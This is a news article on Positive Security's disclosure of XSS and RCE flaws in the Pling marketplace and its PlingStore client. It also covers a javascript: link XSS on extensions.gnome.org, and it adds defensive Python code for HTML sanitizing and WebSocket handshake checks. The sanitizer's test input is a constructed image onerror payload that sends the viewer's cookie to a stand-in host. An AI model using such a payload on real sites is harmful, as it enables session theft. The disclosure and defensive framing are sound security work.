Vulnerabilities identified in Pling that affect the KDE Store, OpenDesktop, AppImage Hub and other stores

A Berlin startup has disclosed a remote code execution (RCE) vulnerability and a cross-site scripting (XSS) vulnerability in Pling, the platform behind several application catalogues, which could allow JavaScript code to be executed in the context of other users. The affected sites include some of the best-known free-software catalogues, such as store.kde.org, appimagehub.com, gnome-look.org, xfce-look.org and pling.com, among others.

Positive Security, which found the holes, says the bugs are still present in the Pling code and that its maintainers have not responded to the vulnerability reports.

Earlier this year, we looked at how popular desktop apps handle user-supplied URIs and found code execution vulnerabilities in most of them. One of the applications I checked was the KDE Discover App Store, which turned out to handle untrusted URIs in an insecure way (CVE-2021-28117, KDE Security Advisory).

Along the way, I also quickly discovered vulnerabilities in other free-software marketplaces.

The XSS flaw can be leveraged into supply-chain attacks on the Pling-based marketplaces, and the RCE affects users of the PlingStore application.

Pling presents itself as a marketplace where designers can upload themes and graphics for the Linux desktop, among other things, in the hope of earning income from supporters. It has two parts: the web code needed to run the marketplace itself, and an Electron-based application (PlingStore) that users can install to manage their content on Pling sites. The web code has the XSS; the client has both the XSS and the RCE. Pling powers several sites, from pling.com and store.kde.org to gnome-look.org and xfce-look.org.

The core of the problem is that the Pling platform allows multimedia blocks to be added in HTML form, for example to embed a YouTube video or an image. The HTML added through this form is not properly validated, which makes it possible to submit malicious markup disguised as an image and to place an entry in the catalogue that runs JavaScript code whenever someone views it. If that entry is viewed by logged-in users, actions can be performed in the catalogue on their behalf, including adding the same JavaScript payload to their own pages, which turns the bug into a kind of network worm.
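As an added example (not Pling's own code, which we have not seen), this is the kind of check that stops such a payload: an allow-list sanitizer for a user-supplied multimedia block, built on Python's standard html.parser. It keeps only `<img>`, `<iframe>` and a few plain text tags, drops every attribute that is not on the allow-list (so an `onerror` handler hidden on an image disappears), and accepts a `src` only when it is an absolute http(s) URL, with iframes further restricted to an assumed list of YouTube hosts. The same scheme check is what would reject a `javascript:` URL of the kind described below for the extensions.gnome.org homepage field. The tag allow-list, the embed hosts and the sample inputs are constructed for this example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allow-list: element -> attributes that survive. Anything else is dropped.
# (Constructed policy for this example; Pling's real rules are not known to us.)
ALLOWED_TAGS = {
    "img": {"src", "alt", "width", "height"},
    "iframe": {"src", "width", "height"},
    "p": set(), "br": set(), "b": set(), "i": set(),
}
# Hosts an <iframe> may embed from (assumed, to model "insert a YouTube video").
EMBED_HOSTS = {"www.youtube.com", "youtube.com", "www.youtube-nocookie.com"}


def safe_url(url, tag):
    """True only for absolute http(s) URLs. Rejects javascript:, data:,
    vbscript: and scheme-less values. urlparse lower-cases the scheme, so
    'JavaScript:' and surrounding whitespace do not slip through."""
    parts = urlparse(url.strip())
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if tag == "iframe" and parts.hostname not in EMBED_HOSTS:
        return False
    return True


class EmbedSanitizer(HTMLParser):
    VOID = {"img", "br"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []            # sanitized fragments, joined at the end
        self.dropped = []        # audit trail of what was removed
        self._skip_until = None  # end tag that re-enables output

    def handle_starttag(self, tag, attrs):
        if self._skip_until:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            if tag in ("script", "style", "object", "svg"):
                self._skip_until = tag   # drop the element's content as well
            return
        if tag in ("img", "iframe"):
            src = dict(attrs).get("src") or ""
            if not safe_url(src, tag):
                self.dropped.append(f"{tag}@src={src!r}")
                if tag == "iframe":
                    self._skip_until = "iframe"
                return
        rendered = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag]:
                self.dropped.append(f"{tag}@{name}")   # onerror, onload, style, ...
                continue
            rendered.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(rendered)}>")

    def handle_endtag(self, tag):
        if self._skip_until:
            if tag == self._skip_until:
                self._skip_until = None
            return
        if tag in ALLOWED_TAGS and tag not in self.VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_until:
            self.out.append(html.escape(data))   # text is never emitted raw


def sanitize_embed(fragment):
    """Return (clean_html, dropped) for one user-supplied multimedia block."""
    parser = EmbedSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    # Constructed payload: an image that exfiltrates the viewer's cookie.
    payload = ('<img src="https://i.example.org/cat.png" '
               'onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">')
    print(sanitize_embed(payload))
```

The parser is the right tool here rather than a regular expression: it lower-cases tag and attribute names, resolves character references before the text is re-escaped, and treats `<script>` bodies as data, so the sanitizer sees the same structure the browser would. Because the decision is an allow-list, an unknown tag, attribute or URL scheme is dropped by default instead of having to be enumerated.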

In addition, a vulnerability was identified in the PlingStore application, which is written on the Electron platform and lets users browse the OpenDesktop catalogues without a web browser and install the packages offered there. The vulnerability in PlingStore allows code to be executed on the user's system.

When the PlingStore application runs, it starts the ocs-manager process, which accepts local connections over WebSocket and carries out commands such as downloading and installing applications in AppImage format. The commands are meant to come from the PlingStore application, but because there is no authentication, a request can also be sent to ocs-manager from the user's web browser. If the user opens a malicious site, that site can open a connection to ocs-manager and execute code on the user's system.
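The fix for a local helper of this kind is to authenticate the WebSocket upgrade before any command is read. The following is an added example, not ocs-manager's code, and its protocol details (the port, the `?token=` query parameter, the `install` command shape, and the `file://` origin an Electron window is assumed to send) are assumptions made for illustration. It checks three things a web page cannot satisfy: the Host header must name the loopback address the helper bound to (which defeats DNS rebinding), the Origin, which browsers always attach to WebSocket upgrades and pages cannot forge, must be absent or on the allow-list, and the caller must present a per-launch secret that the GUI received out of band. Even an authorized caller then only gets an install from an https URL. The sample handshakes at the bottom are constructed.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

# Origins the helper accepts. A native (non-browser) client sends no Origin at
# all; an Electron renderer loaded from disk sends "file://" (assumed here).
ALLOWED_ORIGINS = {"file://"}
LOCAL_HOSTS = {"127.0.0.1", "localhost", "[::1]"}


def new_session_token():
    """Generated once per launch and handed to the GUI out of band (for example
    via a file only the user can read); never reachable from a web page."""
    return secrets.token_urlsafe(32)


def _host_without_port(host):
    if host.startswith("["):                 # IPv6 literal, e.g. "[::1]:5555"
        return host.split("]", 1)[0] + "]"
    return host.split(":", 1)[0]


def authorize_handshake(headers, request_target, expected_token):
    """Decide whether a WebSocket upgrade request may reach the command loop.
    Returns (accepted, reason)."""
    h = {k.lower(): v for k, v in headers.items()}
    # 1. Host must be the loopback name we bound to; anything else means the
    #    page reached us through an attacker-controlled DNS name (rebinding).
    if _host_without_port(h.get("host", "")) not in LOCAL_HOSTS:
        return False, "Host header is not loopback"
    # 2. Browsers attach Origin to every WebSocket upgrade and a page cannot
    #    change it, so a connection from https://evil.example is rejected here.
    origin = h.get("origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, f"origin {origin!r} not allowed"
    # 3. Even an allowed origin must prove it is the real client. The secret is
    #    compared in constant time so timing does not leak it byte by byte.
    token = parse_qs(urlparse(request_target).query).get("token", [""])[0]
    if not hmac.compare_digest(token.encode(), expected_token.encode()):
        return False, "missing or wrong session token"
    return True, "ok"


def handle_command(headers, request_target, expected_token, command):
    """Only an authorized connection may request an install, and the install
    source itself must be an https URL (constructed command shape)."""
    ok, reason = authorize_handshake(headers, request_target, expected_token)
    if not ok:
        return "rejected", reason
    if command.get("op") != "install":
        return "rejected", "unknown command"
    src = urlparse(command.get("url", ""))
    if src.scheme != "https" or not src.hostname:
        return "rejected", "install source must be an https URL"
    return "accepted", f"would download {command['url']}"


# Constructed handshakes for illustration (a real token comes from new_session_token()).
TOKEN = "example-token-not-secret"
GUI_REQUEST = ({"Host": "127.0.0.1:5555", "Origin": "file://", "Upgrade": "websocket"},
               f"/?token={TOKEN}")
WEB_PAGE_REQUEST = ({"Host": "127.0.0.1:5555", "Origin": "https://evil.example",
                     "Upgrade": "websocket"}, "/")
REBOUND_REQUEST = ({"Host": "evil.example:5555", "Origin": "https://evil.example"},
                   f"/?token={TOKEN}")

if __name__ == "__main__":
    for name, req in (("gui", GUI_REQUEST), ("web page", WEB_PAGE_REQUEST),
                      ("rebinding", REBOUND_REQUEST)):
        print(name, authorize_handshake(*req, TOKEN))
```

The Origin check alone is not enough: a non-browser process on the same machine, or a browser page that has found a way to suppress the header, would pass it, which is why the session token is mandatory and why the Host check sits in front of both. Binding the listener to 127.0.0.1 rather than 0.0.0.0 is assumed and is the other half of the same fix.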

An XSS vulnerability was also reported in the extensions.gnome.org catalogue: in the field for the plugin's homepage URL, JavaScript code could be entered in the form "javascript:code", and clicking the link would then execute that JavaScript instead of opening the project site.

On the one hand, the problem is largely theoretical, since the content of the extensions.gnome.org catalogue is moderated and the attack requires not just opening a particular page but an explicit click on the link. On the other hand, a moderator reviewing a submission may well want to visit the project site, not notice the form of the link, and end up running the JavaScript in the context of their own account.

Finally, if you want to know more about it, you can consult the details at the following link.

